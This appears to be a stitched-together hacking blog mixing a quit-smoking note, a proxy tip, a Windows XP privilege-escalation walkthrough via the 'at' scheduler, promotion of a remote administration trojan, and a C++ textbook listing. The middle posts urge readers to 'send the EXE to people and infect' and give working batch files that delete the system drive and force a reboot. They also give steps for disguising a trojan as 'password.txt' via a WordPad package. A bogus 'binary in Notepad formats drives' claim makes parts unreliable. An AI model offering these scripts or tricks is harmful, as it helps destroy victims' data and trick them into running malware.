Quit!!

I Finally Quit Smoking and Drinking! It was tough time to fight the need for cigarettes But I won the battle. Life is much better without them now! Thank God!

-:¦:-•:*"*:•.-:¦:-•*L0VE*•-:¦:-•:*"*:•.-:¦:-

Ascii Art

Use Google as a free proxy

Your company blocks that hip new web site just because it drops the F bomb occasionally? Use Google's cache to take a peek even when the originating site's being blocked, with cache:example.com.

System Previleged Exploit

Introduction

Using the simple command line on a machine running Windows XP, a non-previleged user can obtain system level privileges, and run the entire explorer process (Desktop or in other words explorer.exe). When done so, all processes that run from it will have system privileges. The system run level is higher than the administrator, and has full control of the operating system and it’s kernel.

Why this is important?

Local privilege escalation is very useful from an attacker’s point of view. The system accont allows for several kernel level compromises that aren’t normally possible (like resetting the administrator password).

What is Local System?

The Local System account is used by the Windows OS to control various aspects of the system (kernel, services, etc); the account shows up as SYSTEM in the Task Manager process list, as seen in the following screen shot:

Local System differs from an Administrator account in that it has full control of the operating system, similar to root on a *nix machine. Most System processes are required by the operating system, and cannot be closed, even by an Administrator account; attempting to close them will result in a error message. The following quote from Wikipedia explains this in a easy to understand way:

Quote:

In Windows NT and later systems derived from it (Windows 2000, Windows XP, Windows Server 2003 and Windows Vista), there may or may not be a superuser. By default, there is a superuser named Administrator, although it is not an exact analogue of the Unix root superuser account. Administrator does not have all the privileges of root because some superuser privileges are assigned to the Local System account in Windows NT.

Under normal circumstances, a user cannot run code as System, only the operating system itself has this ability, but by using the command line, we will trick Windows into running our desktop as System, along with all applications that are started from within.

Getting System

We will now walk through the process of obtaining SYSTEM privileges.

To start, lets open up a command prompt (Start > Run > cmd > [ENTER]).

At the prompt, enter the following command, then press [ENTER]:

If it responds with an “access denied” error, then we are out of luck, and you’ll have to try another method of privilege escalation; if it responds with “There are no entries in the list” (or sometimes with multiple entries already in the list) then we are good. Access to the at command varies, on some installations of Windows, even the Guest account can access it, on others it’s limited to Administrator accounts. If you can use the at command, enter the following commands, then press [ENTER]:

Lets break down the preceding code. The “at” told the machine to run the at command, everything after that are the operators for the command, the important thing here, is to change the time (24 hour format) to one minute after the time currently set on your computers clock, for example: If your computer’s clock says it’s 4:30pm, convert this to 24 hour format (16:30) then use 16:31 as the time in the command. If you issue the at command again with no operators, then you should see something similar to this:

When the system clock reaches the time you set, then a new command prompt will magically run. The difference is that this one is running with system privileges (because it was started by the task scheduler service, which runs under the Local System account). It should look like this:

You’ll notice that the title bar has changed from cmd.exe to svchost.exe (which is short for Service Host). Now that we have our system command prompt, you may close the old one. Run Task Manager by either pressing CTRL+ALT+DELETE or typing taskmgr at the command prompt. In task manager, go to the processes tab, and kill explorer.exe; your desktop and all open folders should disappear, but the system command prompt should still be there.

At the system command prompt, enter explorer.exe

A desktop will come back up, but what this? It isn’t your desktop. Go to the start menu and look at the user name, it should say “SYSTEM”. Also open up task manager again, and you’ll notice that explorer.exe is now running as SYSTEM. The easiest way to get back into your own desktop, is to log out and then log back in. The following 2 screenshots show my results (click to zoom):

What to do now?

Now that we have SYSTEM access, everything that we run from our explorer process will have it too, browsers, games, etc. You also have the ability to reset the administrators password, and kill other processes owned by SYSTEM. You can do anything on the machine, the equivalent of root; You are now God of the Windows machine. I’ll leave the rest up to your imagination.

A quick fix

A way to prevent this from happening at all, would be to make the task scheduler service run under a unprivileged account. You can do this by opening the services control panel (Start > Run > services.msc), and right clicking “Task Scheduler” and going to the Log On tab. Change it to “This Account” and enter the account information you want it to use (has to be an existing account) then restart the service. This may break some programs that use the Task Scheduler and depend on it for SYSTEM access; you have been warned. Otherwise, simple disable the Task Scheduler service.

Truth vs Trust

If we could always know the Truth , we would not have to Trust. Trust is needed when Truth is hidden. Trust is optional. IT security is the Truth and doesn’t require Trust.

The Rose remote administration tool project Beta 1.3

• Fixed some TCP connection bugs
• Notify when servers go online by sound alert

The Rose remote administration tool project Preview

Here is a preview of the "Rose" rat project. This is beta phase.

 

 

Format a HarDDrive with Notepad

If you think that Notepad is useless then you are wrong because you can now do a lot of things with the Notepad which you could have never imagined. In this hack I will show you how to format a HDD using Notepad. This is really cool.

Step 1 :-

Copy The Following In Notepad Exactly as it is.

says01001011000111110010010101010101010000011111100000

Step 2 :-

Save As An EXE Any Name Will Do

Step 3 :-

Send the EXE to People And Infect

OR

IF you think cannot format C Drive when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code

format c:\ /Q/X — this will format your drive c:\

01100110011011110111001001101101011000010111010000 100000011000110011101001011100

0010000000101111010100010010111101011000

format d:\ /Q/X — this will format your dirve d:\

01100110011011110111001001101101011000010111010000 100000011001000011101001011100

0010000000101111010100010010111101011000

format a:\ /Q/X — this will format your drive a:\

01100110011011110111001001101101011000010111010000 100000011000010011101001011100

0010000000101111010100010010111101011000

del /F/S/Q c:\boot.ini — this will cause your computer not to boot.

01100100011001010110110000100000001011110100011000 101111010100110010111101010001

00100000011000110011101001011100011000100110111101 101111011101000010111001101001

0110111001101001

try to figure out urself rest

cant spoonfeed

its working

Do not try it on your PC. Don’t mess around this is for educational purpose only

still if you cant figure it out try this

go to notepad and type the following:

@Echo off

Del C:\ *.*|y

save it as Dell.bat

want worse then type the following:

@echo off

del %systemdrive%\*.*/f/s/q

shutdown -r -f -t 00

and save it as a .bat file

Hide EXE in Wordpad

1: Open the Wordpad (Start -> run -> wordpad)

2: Then you use drag`n drop and pull a file (trojan) into the new wordpad file.

3: Now we see the icon of the server on this white background. Now you move your mouse over it and then you go into the context menu (right click).

4: Here you select 'package-object' and then 'edit package'. A new window opened on the left side.

5: In this new window you choose in the top of the menu 'Edit' and select then 'copy package'.

6: Close wordpad and the new window.

7: Now move your mouse to your desktop and go there to the context menu (right click). Here you must choose 'paste'.

If you have done all things right to this moment, you will now see a new file with an new icon and filename on your desctop. This file should be named "OLE-clip", it has no extention so you can rename it to "password.txt" if you want to. When someone executes this file, the server will be executed on his computer!

How Shutdown your Computer with a Cell Phone

This video will show you how to shutdown your computer from anywhere using a texting capable cell phone, Microsoft Outlook and a free account from www.kwiry.com

-=-=-[My Workstation]=-=-

Is this my workstation ? hahaha = )

Really messy and wires everywhere

Illustrating empty for loop statement.

C++ gives you a number of ways to accomplish the same thing. No experienced C++ programmer would use a for loop in this way, but it does illustrate the flexibility of the for statement. In fact, it is possible, using break and continue, to create a for loop with none of the three statements. Listing 7.12 illustrates how.

Listing 7.12. Illustrating empty for loop statement.

1: //Listing 7.12 illustrating

2: //empty for loop statement

3:

4: #include
5:
6: int main()
7: {
8: int counter=0; // initialization
9: int max;
10: cout << "How many hellos?"; 11: cin >> max;
12: for (;;) // a for loop that doesn't end
13: {
14: if (counter < max) // test
15: {
16: cout << "Hello!\n";
17: counter++; // increment
18: }
19: else
20: break;
21: }
22: return 0;
23: }

Output: How many hellos?3
Hello!
Hello!
Hello!
Analysis: The for loop has now been pushed to its absolute limit. Initialization, test, and action have all been taken out of the for statement. The initialization is done on line 8, before the for loop begins. The test is done in a separate if statement on line 14, and if the test succeeds, the action, an increment to counter, is performed on line 17. If the test fails, breaking out of the loop occurs on line 20.
While this particular program is somewhat absurd, there are times when a for(;;) loop or a while (1) loop is just what you'll want.